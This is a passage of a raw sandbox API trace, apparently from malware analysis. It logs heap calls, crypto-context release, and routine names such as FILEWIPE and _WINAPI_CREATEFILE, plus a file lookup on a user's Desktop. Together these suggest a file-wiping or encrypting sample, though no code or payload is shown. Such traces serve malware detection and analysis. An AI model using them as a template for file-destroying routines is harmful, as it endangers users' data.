wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.334] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.335] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.335] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.335] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.335] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.335] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.335] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.335] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.335] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.335] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.335] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.336] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.336] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.336] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.336] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.336] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.336] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.337] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0031.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.338] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.338] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0031.338] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.338] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.340] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.341] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0031.341] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.341] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x7f98f740, ftLastWriteTime.dwHighDateTime=0x1d5c185, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5EM8.avi", cAlternateFileName="")) returned 0x7c2240 [0031.342] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.342] CharLowerBuffW (in: lpsz="byte[74692]", cchLength=0xb | out: lpsz="byte[74692]") returned 0xb [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.342] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.343] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.343] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da1e8 [0031.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da1e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0031.343] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.343] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0031.343] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.344] 